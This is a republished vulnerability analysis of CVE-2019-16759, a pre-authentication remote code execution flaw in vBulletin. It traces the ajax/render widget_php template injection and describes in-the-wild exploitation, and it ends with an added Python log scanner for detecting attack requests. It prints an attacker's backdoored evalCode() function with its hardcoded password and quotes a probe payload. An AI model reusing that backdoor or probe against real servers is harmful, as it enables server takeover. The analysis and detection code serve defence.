2025-01-16 Update From: SLTechnology News&Howtos (Network Security)
Shulou (Shulou.com) 05/31 Report
This article explains how to analyse CVE-2019-16759, a pre-authentication remote code execution vulnerability in vBulletin. The content is fairly detailed; interested readers can use it as a reference, and we hope it is helpful.
vBulletin has disclosed the details of a recent zero-day vulnerability, assigned CVE-2019-16759. At the same time, security researchers at Unit 42 have observed many attackers exploiting this vulnerability in the wild. With it, an unauthenticated attacker can gain access to and control of servers running vBulletin v5.0.0 to v5.5.4 and lock network administrators out of those servers. Around 100,000 websites currently run vBulletin, including many large enterprises, organizations and forums, so this vulnerability should be patched immediately.
In this article, we analyse the root cause of the vulnerability and provide PoC demonstration code and other details.
Analysis of the cause of the vulnerability
CVE-2019-16759 is a pre-authentication remote code execution vulnerability with a CVSS score of 9.8. An Ajax rendering function introduced in vBulletin 5.0.0 allows PHP server-side template injection, which ultimately leads to this pre-authentication remote code execution.
First, let's take a look at the index.php code:
This code calls vB5_Frontend_ApplicationLight::isQuickRoute() to determine whether the request is a "quick route". isQuickRoute() is located in includes/vb5/frontend/applicationlight.php:
In the figure above, if the request starts with "ajax/api" or "ajax/render", the function returns true and the vB5_Frontend_ApplicationLight object is initialized.
When the received request starts with "ajax/render", the handler shown above is set to "callRender":
The callRender() function in the figure above renders the template using parameters from $routeInfo[2] and $params, where $params comes from array_merge($_POST, $_GET):
According to the figure above, the vbulletin-style.xml file contains a widget_php template. If $widgetConfig['code'] in the template is not empty and the $vboptions['disable_php_rendering'] option is disabled, the following code is executed:
{vb:action evaledPHP, bbcode, evalCode, {vb:raw widgetConfig.code}} {vb:raw $evaledPHP}
The figure above shows the code of the evalCode() function: the commands in $code are executed directly by PHP's eval() function. The request constructed using the params parameter is as follows:
Vulnerability proof of concept (PoC)
Because the routestring parameter comes from $_REQUEST, it can be sent via $_GET, $_POST or $_COOKIE, while widgetConfig[code] can be sent via $_GET or $_POST, so we construct the following request:
The figure above shows the result of phpinfo() running after the PoC is sent via a GET request.
The following figure shows the result of phpinfo() running after the PoC is sent via a POST request:
Analysis of in-the-wild exploitation
So far, researchers have detected several cases of this vulnerability being exploited in the wild. As shown in the following figure, the attacker attempted to execute the command "die(@md5(HellovBulletin))" to determine whether the target server was vulnerable, but the attempt failed because of an extra equal sign "=" in the request:
The following figure shows an attacker attempting to create a file named "webconfig.txt.php" in the web root directory of the target server:
The following figure shows the contents of webconfig.txt.php: a one-line PHP webshell that allows the attacker to send arbitrary commands to the target host and have them executed:
The following figure shows a third example of in-the-wild exploitation, in which the attacker attempted to overwrite the bbcode.php file:
After a successful exploit, the evalCode() function looks like this:
    function evalCode($code)
    {
        ob_start();
        // Backdoor added by the attacker: only run the supplied code when the "epass" secret matches
        if (isset($_REQUEST["epass"]) && $_REQUEST["epass"] == "2dmfrb28nu3c6s9j") {
            eval($code);
        }
        $output = ob_get_contents();
        ob_end_clean();
        return $output;
    }
In this way, when "epass" is sent in the request with the value "2dmfrb28nu3c6s9j", the target host executes the code passed to evalCode().
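As an added defensive illustration (not part of the original article), the following Python script scans web-server access log lines for the request shape described in the PoC and in-the-wild sections above: a routestring of ajax/render/widget_php, the widgetConfig[code] parameter, and POST requests whose body the access log cannot show. The log lines are constructed samples, and treating the request path as an implicit routestring assumes the stock vBulletin rewrite rule.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines in combined log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.10 - - [25/Sep/2019:10:01:02 +0000] "GET /index.php?routestring=ajax/render/widget_php&widgetConfig[code]=phpinfo()%3B HTTP/1.1" 200 5120 "-" "curl/7.58.0"
203.0.113.11 - - [25/Sep/2019:10:01:05 +0000] "POST /index.php?routestring=ajax%2Frender%2Fwidget_php HTTP/1.1" 200 512 "-" "python-requests/2.22"
198.51.100.7 - - [25/Sep/2019:10:02:00 +0000] "GET /ajax/render/widget_php?widgetConfig%5Bcode%5D=echo+1%3B HTTP/1.1" 200 40 "-" "Mozilla/5.0"
198.51.100.8 - - [25/Sep/2019:10:03:00 +0000] "GET /forum/showthread.php?t=42 HTTP/1.1" 200 8000 "-" "Mozilla/5.0"
198.51.100.9 - - [25/Sep/2019:10:04:00 +0000] "GET /ajax/render/widget_tagcloud HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

def analyse_request(method: str, target: str):
    """Classify one request; returns a finding dict or None if it is not a widget_php render."""
    parts = urlsplit(target)
    query = parse_qs(parts.query, keep_blank_values=True)
    # routestring is normally an explicit parameter; with the stock rewrite rule the request
    # path itself becomes the routestring (deployment assumption, see lead-in).
    route = query.get("routestring", [unquote(parts.path)])[0].lstrip("/")
    if not route.startswith("ajax/render/"):
        return None
    template = route[len("ajax/render/"):]
    code = query.get("widgetConfig[code]")
    if template != "widget_php" and code is None:
        return None
    if code is not None:
        severity, reason = "high", "widgetConfig[code] present in query string"
    elif method == "POST":
        # The payload may sit in the POST body or a cookie, which the access log does not record.
        severity, reason = "medium", "widget_php rendered via POST; body not logged"
    else:
        severity, reason = "low", "widget_php rendered without code parameter"
    return {"severity": severity, "reason": reason, "template": template, "code": code[0] if code else None}

def scan_log(text: str):
    """Run analyse_request over every parseable log line and collect the findings."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        finding = analyse_request(m["method"], m["target"])
        if finding:
            finding.update(ip=m["ip"], ts=m["ts"], status=int(m["status"]))
            findings.append(finding)
    return findings
```

Because routestring can also arrive in a cookie, a request that looks harmless in the access log may still reach widget_php; the POST finding is there to prompt a check of full request captures or the application log.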
Vulnerability fix
The researchers advise network administrators to update vBulletin to the patch-level releases for v5.5.2, 5.5.3 and 5.5.4 as soon as possible.
This concludes our analysis of the vBulletin pre-authentication remote code execution vulnerability CVE-2019-16759; we hope it has been helpful.